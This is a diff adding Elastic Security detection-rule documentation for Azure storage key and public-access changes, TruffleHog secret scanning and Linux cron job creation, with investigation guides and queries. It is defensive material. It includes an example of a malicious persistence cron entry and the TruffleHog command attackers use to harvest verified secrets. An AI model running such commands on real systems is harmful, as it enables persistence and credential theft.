+- Investigate the timing of the event to correlate with any other suspicious activities, such as unusual login patterns or privilege escalation attempts.
+- Examine the request or response body details to understand the full scope of changes made to the storage account configuration beyond public access settings.
+- Review access logs for the affected storage account to identify any subsequent data access or exfiltration attempts following the public access enablement.
+- Verify if the storage account modification aligns with approved change requests or maintenance windows in your organization.
+- Check for other storage accounts modified by the same principal to identify potential lateral movement or widespread configuration changes.
+- Pivot into related activity for the storage account and/or container, such as data deletion, encryption, or further permission changes.
+
+
+*False positive analysis*
+
+
+- Legitimate CDN integration or public website hosting may require enabling public blob access. Document approved storage accounts used for public content delivery and create exceptions for these specific resources.
+- DevOps automation tools might temporarily enable public access during deployment processes. Identify service principals used by CI/CD pipelines and consider time-based exceptions during deployment windows.
+- Testing and development environments may have different access requirements. Consider filtering out non-production storage accounts if public access is acceptable in those environments.
+- Migration activities might require temporary public access. Coordinate with infrastructure teams to understand planned migrations and create temporary exceptions with defined expiration dates.
+
+
+*Response and remediation*
+
+
+- Immediately disable public blob access on the affected storage account using the Azure Portal, IaC, or the Azure CLI.
+- Audit all blob containers within the affected storage account to identify which data may have been exposed and assess the potential impact of the exposure.
+- Review Azure Activity Logs and storage access logs to determine if any data was accessed or exfiltrated while public access was enabled.
+- Rotate any credentials, keys, or sensitive data that may have been stored in the exposed blob containers.
+- If unauthorized modification is confirmed, disable the compromised user account or service principal and investigate how the credentials were obtained.
+- Implement Azure Policy to prevent enabling public blob access on storage accounts containing sensitive data, using built-in policy definitions for storage account public access restrictions.
+- Consider implementing private endpoints for storage accounts that should never be publicly accessible, ensuring network-level isolation.
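+
+As suggested in the investigation steps, pivoting into other storage account configuration changes by the same principal can reveal broader tampering. Dropping the response body filter from the rule query below gives a simple starting point. The query is illustrative only, and results still need to be scoped to the principal and time window of interest.
+
+[source, js]
+----------------------------------
+event.dataset: "azure.activitylogs" and
+event.action: "MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and
+event.outcome: "success"
+
+----------------------------------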
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +event.action: "MICROSOFT.STORAGE/STORAGEACCOUNTS/WRITE" and +event.outcome: "success" and +azure.activitylogs.properties.responseBody: *\"allowBlobPublicAccess\"\:true* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Collection +** ID: TA0009 +** Reference URL: https://attack.mitre.org/tactics/TA0009/ +* Technique: +** Name: Data from Cloud Storage +** ID: T1530 +** Reference URL: https://attack.mitre.org/techniques/T1530/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc new file mode 100644 index 0000000000..4cfef4bf22 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-key-regenerated.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-8-azure-storage-account-key-regenerated]] +=== Azure Storage Account Key Regenerated + +Identifies a rotation to storage account access keys in Azure. Regenerating access keys can affect any applications or Azure services that are dependent on the storage account key. Adversaries may regenerate a key as a means of acquiring credentials to access systems and resources. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Storage Account Key Regenerated* + + +Azure Storage Account keys are critical credentials that grant access to storage resources. They are often used by applications and services to authenticate and interact with Azure Storage. Adversaries may regenerate these keys to gain unauthorized access, potentially disrupting services or exfiltrating data. The detection rule monitors for key regeneration events, flagging successful operations as potential indicators of credential misuse, thus enabling timely investigation and response. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific storage account associated with the key regeneration event by examining the operation_name field for "MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION". +- Check the event.outcome field to confirm the success of the key regeneration and gather details about the user or service principal that initiated the action. 
+- Investigate the user or service principal's recent activities in Azure to determine if there are any other suspicious actions or patterns that could indicate unauthorized access or misuse. +- Assess the impact on applications and services that rely on the affected storage account key by identifying dependencies and checking for any service disruptions or anomalies. +- Review access policies and permissions for the storage account to ensure they are appropriately configured and consider implementing additional security measures, such as Azure Key Vault, to manage and rotate keys securely. + + +*False positive analysis* + + +- Routine key rotation by administrators or automated scripts can trigger alerts. To manage this, identify and document regular key rotation schedules and exclude these events from alerts. +- Development and testing environments often regenerate keys frequently. Exclude these environments from alerts by filtering based on environment tags or resource names. +- Third-party integrations or services that require periodic key regeneration might cause false positives. Work with service owners to understand these patterns and create exceptions for known, legitimate services. +- Azure policies or compliance checks that enforce key rotation can also lead to false positives. Coordinate with compliance teams to align detection rules with policy schedules and exclude these events. +- Ensure that any automated processes that regenerate keys are logged and documented. Use this documentation to create exceptions for these processes in the detection rule. + + +*Response and remediation* + + +- Immediately revoke the regenerated storage account keys to prevent unauthorized access. This can be done through the Azure portal or using Azure CLI commands. +- Identify and update all applications and services that rely on the compromised storage account keys with new, secure keys to restore functionality and prevent service disruption. +- Conduct a thorough review of access logs and audit trails to identify any unauthorized access or data exfiltration attempts that may have occurred using the regenerated keys. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems or accounts have been compromised. +- Implement conditional access policies and multi-factor authentication (MFA) for accessing Azure resources to enhance security and prevent similar incidents. +- Review and update the storage account's access policies and permissions to ensure that only authorized users and applications have the necessary access. +- Enhance monitoring and alerting mechanisms to detect future unauthorized key regeneration attempts promptly, ensuring timely response to potential threats. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
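+
+Reviewing key regenerations alongside key listing activity on the same storage accounts can help distinguish routine rotation from credential harvesting. The query below is an illustrative hunting pivot that combines this rule's operation with the key listing operation used by a related rule in this package; it is not part of the rule and should be adapted to your environment.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and azure.activitylogs.operation_name:
+  ("MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION" or
+  "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION") and
+event.outcome:(Success or success)
+
+----------------------------------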
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.STORAGE/STORAGEACCOUNTS/REGENERATEKEY/ACTION" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc new file mode 100644 index 0000000000..c820a134ca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user.asciidoc @@ -0,0 +1,139 @@ +[[prebuilt-rule-8-19-8-azure-storage-account-keys-accessed-by-privileged-user]] +=== Azure Storage Account Keys Accessed by Privileged User + +Identifies unusual high-privileged access to Azure Storage Account keys by users with Owner, Contributor, or Storage Account Contributor roles. This technique was observed in STORM-0501 ransomware campaigns where compromised identities with high-privilege Azure RBAC roles retrieved access keys to perform unauthorized operations on Storage Accounts. Microsoft recommends using Shared Access Signature (SAS) models instead of direct key access for improved security. This rule detects when a user principal with high-privilege roles accesses storage keys for the first time in 7 days. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ +* https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Azure Activity Logs +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Azure Storage Account Keys Accessed by Privileged User* + + +Azure Storage Account keys provide full administrative access to storage resources. While legitimate administrators may occasionally need to access these keys, Microsoft recommends using more granular access methods like Shared Access Signatures (SAS) or Azure AD authentication. 
This detection identifies when users with high-privilege roles (Owner, Contributor, Storage Account Contributor, or User Access Administrator) access storage account keys, particularly focusing on unusual patterns that may indicate compromise. This technique was notably observed in STORM-0501 ransomware campaigns where compromised identities retrieved keys for unauthorized storage operations. + + +*Possible investigation steps* + + +- Review the `azure.activitylogs.identity.authorization.evidence.principal_id` to identify the specific user who accessed the storage account keys. +- Examine the `azure.resource.name` field to determine which storage account's keys were accessed and assess the sensitivity of data stored there. +- Check the `azure.activitylogs.identity.authorization.evidence.role` to confirm the user's assigned role and whether this level of access is justified for their job function. +- Investigate the timing and frequency of the key access event - multiple key retrievals in a short timeframe may indicate automated exfiltration attempts. +- Review the source IP address and geographic location of the access request to identify any anomalous access patterns or locations. +- Correlate this event with other activities by the same principal ID, looking for patterns such as permission escalations, unusual data access, or configuration changes. +- Check Azure AD sign-in logs for the user around the same timeframe to identify any suspicious authentication events or MFA bypasses. +- Examine subsequent storage account activities to determine if the retrieved keys were used for data access, modification, or exfiltration. + + +*False positive analysis* + + +- DevOps and infrastructure teams may legitimately access storage keys during deployment or migration activities. Document these planned activities and consider creating exceptions for specific time windows. +- Emergency troubleshooting scenarios may require administrators to retrieve storage keys. Establish a process for documenting these emergency accesses and review them regularly. +- Automated backup or disaster recovery systems might use high-privilege service accounts that occasionally need key access. Consider using managed identities or service principals with more restricted permissions instead. +- Legacy applications that haven't been migrated to use SAS tokens or Azure AD authentication may still require key-based access. Plan to modernize these applications and track them as exceptions in the meantime. +- New storage account provisioning by administrators will often include initial key retrieval. Consider the age of the storage account when evaluating the risk level. + + +*Response and remediation* + + +- Immediately rotate the storage account keys that were accessed using Azure Portal or Azure CLI. +- Review all recent activities on the affected storage account to identify any unauthorized data access, modification, or exfiltration attempts. +- If unauthorized access is confirmed, disable the compromised user account and initiate password reset procedures. +- Audit all storage accounts accessible by the compromised identity and rotate keys for any accounts that may have been accessed. +- Implement Entra ID authentication or SAS tokens for applications currently using storage account keys to reduce future risk. +- Configure Azure Policy to restrict the listKeys operation to specific roles or require additional approval workflows. 
+- Review and potentially restrict the assignment of high-privilege roles like Owner and Contributor, following the principle of least privilege. +- Enable diagnostic logging for all storage accounts to maintain detailed audit trails of access and operations. +- Consider implementing Privileged Identity Management (PIM) for just-in-time access to high-privilege roles that can list storage keys. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.activitylogs" and +azure.activitylogs.operation_name: "MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION" and +azure.activitylogs.identity.authorization.evidence.principal_type: "User" and +azure.activitylogs.identity.authorization.evidence.role: ( + "Owner" or + "Contributor" or + "Storage Account Contributor" or + "User Access Administrator" +) and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc new file mode 100644 index 0000000000..bfe4f8b0c0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-8-credential-access-via-trufflehog-execution]] +=== Credential Access via TruffleHog Execution + +This rule detects the execution of TruffleHog, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials. This tool was abused by the Shai-Hulud worm to search for credentials in code repositories. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Credential Access via TruffleHog Execution* + + +This rule flags TruffleHog executed to scan the local filesystem with verified JSON results, a direct path to harvesting secrets from source code, configs, and build artifacts. Attackers gain shell access on a developer workstation or CI runner, clone or point to internal repositories, run 'trufflehog --results=verified --json filesystem .' to enumerate valid tokens, and then pivot using the recovered keys to pull private code or authenticate to cloud and CI/CD systems. + + +*Possible investigation steps* + + +- Review binary path, code signature/hash, parent process chain, initiating user, and host role (developer workstation vs CI runner) to quickly decide if the execution matches an approved secret-scanning job or an ad‑hoc run. +- Determine the working directory and target path used by the scan to identify which repositories or configuration directories were inspected and whether sensitive files (e.g., .env, deployment keys, build secrets) were in scope. +- Pivot to same-session activity to spot credential use or exfiltration by correlating subsequent outbound connections to git remotes or cloud/CI APIs and launches of developer CLIs like git, gh, aws, az, gcloud, docker, kubectl, or vault. +- Look for output artifacts and exfil channels by checking for creation or deletion of JSON reports or archives, clipboard access, or piping of results to curl/wget/netcat and whether those artifacts were emailed or uploaded externally. +- Cross-check VCS and CI/CD audit logs for this identity and host for unusual pushes, pipeline changes, or new tokens issued shortly after the scan, which may indicate worm-like propagation or credential abuse. + + +*False positive analysis* + + +- An approved secret-scanning task by a developer or security engineer runs trufflehog with --results=verified --json filesystem to audit local code and configuration, producing benign activity on a development host. +- An internal automation or scheduled job invokes trufflehog to baseline filesystem secrets for compliance or hygiene checks, leading to expected process-start logs without credential abuse. + + +*Response and remediation* + + +- Immediately isolate the host or CI runner, terminate the trufflehog process and its parent shell/script, and block egress to git remotes and cloud APIs from that asset. +- Collect the verified findings from trufflehog output (stdout or JSON file), revoke and rotate any listed secrets (GitHub personal access tokens, AWS access keys, Azure service principal credentials, CI job tokens), and clear credential caches on the host. +- Remove unauthorized trufflehog binaries/packages, helper scripts, and scheduled tasks; delete report files and scanned working directories (local repo clones, .env/config folders), and purge shell history containing exfil commands like curl/wget/netcat. +- Restore the workstation or runner from a known-good image if tampering is suspected, re-enroll endpoint protection, reissue required developer or CI credentials with least privilege, and validate normal pulls to internal git and cloud services. 
+- Escalate to full incident response if trufflehog ran under a service account, on a build server/CI runner, or if any discovered secret was used to authenticate to external git remotes (e.g., github.com), cloud APIs, or private registries in the same session. +- Harden by blocking unapproved trufflehog execution via application control, moving approved secret scanning to a locked-down pipeline, enforcing short-lived PATs and key rotation, enabling egress filtering from developer hosts/runners, and deploying fleet-wide detections for "trufflehog --results=verified --json filesystem". + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and process.name : ("trufflehog.exe", "trufflehog") and +process.args == "--results=verified" and process.args == "--json" and process.args == "filesystem" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc new file mode 100644 index 0000000000..6a8cb8c081 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-cron-job-created-or-modified.asciidoc @@ -0,0 +1,249 @@ +[[prebuilt-rule-8-19-8-cron-job-created-or-modified]] +=== Cron Job Created or Modified + +This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ +* https://www.elastic.co/security-labs/primer-on-persistence-mechanisms + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Execution +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 18 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Cron Job Created or Modified* + +Linux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. + +By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. 
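+
+As a purely illustrative example (the file name, schedule, and script path below are hypothetical), a persistence attempt of the kind this rule targets could be a file dropped into a monitored location such as /etc/cron.d/, for instance:
+
+[source, sh]
+----------------------------------
+# Hypothetical /etc/cron.d/system-update entry dropped by an attacker:
+# runs a hidden script as root every five minutes and discards all output
+*/5 * * * * root /var/tmp/.cache/update.sh >/dev/null 2>&1
+----------------------------------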
+ +This rule monitors the creation of cron jobs by monitoring for file creation and rename events in the most common cron job task location directories. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + + +*Possible Investigation Steps* + + +- Investigate the cron job file that was created or modified. +- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery. + - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/cron.allow.d/%' OR path LIKE '/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%'\nOR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR path LIKE '/etc/cron.monthly/%' OR path LIKE\n'/var/spool/cron/crontabs/%')\n"}} + - !{osquery{"label":"Osquery - Retrieve Cron File Information","query":"SELECT * FROM file WHERE (path = '/etc/cron.allow' OR path = '/etc/cron.deny' OR path = '/etc/crontab')\n"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT f.path, u.username AS file_owner, g.groupname AS group_owner, datetime(f.atime, 'unixepoch') AS\nfile_last_access_time, datetime(f.mtime, 'unixepoch') AS file_last_modified_time, datetime(f.ctime, 'unixepoch') AS\nfile_last_status_change_time, datetime(f.btime, 'unixepoch') AS file_created_time, f.size AS size_bytes FROM file f LEFT\nJOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE ( path LIKE '/etc/cron.allow.d/%' OR path LIKE\n'/etc/cron.d/%' OR path LIKE '/etc/cron.hourly/%' OR path LIKE '/etc/cron.daily/%' OR path LIKE '/etc/cron.weekly/%' OR\npath LIKE '/etc/cron.monthly/%' OR path LIKE '/var/spool/cron/crontabs/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. 
+- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes. + - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration. + - !{osquery{"label":"Osquery - Retrieve Listening Ports","query":"SELECT pid, address, port, socket, protocol, path FROM listening_ports"}} + - !{osquery{"label":"Osquery - Retrieve Open Sockets","query":"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets"}} + - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} + + +*False Positive Analysis* + + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + + +*Related Rules* + + +- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042 +- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f +- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b +- Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c +- Systemd Service Created - 17b0a495-4d9f-414c-8ad0-92f018b8e001 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Delete the service/timer or restore its original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. 
+ + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
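+
+Where Osquery is not available, a rough shell equivalent of the file-listing checks referenced in the investigation steps above might look like the following sketch (the seven-day window is an arbitrary example):
+
+[source, sh]
+----------------------------------
+# List cron-related files changed in the last 7 days, with ownership and timestamps
+find /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily \
+     /etc/cron.weekly /etc/cron.monthly /var/spool/cron/crontabs \
+     -type f -mtime -7 -exec ls -la {} + 2>/dev/null
+
+# Review the contents of any recently modified entries
+find /etc/cron.d /var/spool/cron/crontabs -type f -mtime -7 -exec cat {} + 2>/dev/null
+----------------------------------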
+ + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and +event.action in ("rename", "creation") and file.path : ( + "/etc/cron.allow", "/etc/cron.deny", "/etc/cron.d/*", "/etc/cron.hourly/*", "/etc/cron.daily/*", "/etc/cron.weekly/*", + "/etc/cron.monthly/*", "/etc/crontab", "/var/spool/cron/crontabs/*", "/var/spool/anacron/*" +) and not ( + process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/local/bin/dockerd", "/opt/elasticbeanstalk/bin/platform-engine", + "/opt/puppetlabs/puppet/bin/ruby", "/usr/libexec/platform-python", "/opt/imunify360/venv/bin/python3", + "/opt/eset/efs/lib/utild", "/usr/sbin/anacron", "/usr/bin/podman", "/kaniko/kaniko-executor", + "/usr/bin/pvedaemon", "./usr/bin/podman", "/usr/lib/systemd/systemd" + ) or + file.path like ("/var/spool/cron/crontabs/tmp.*", "/etc/cron.d/jumpcloud-updater") or + file.extension in ("swp", "swpx", "swx", "dpkg-remove") or + file.Ext.original.extension == "dpkg-new" or + process.executable : ( + "/nix/store/*", "/var/lib/dpkg/*", "/tmp/vmis.*", 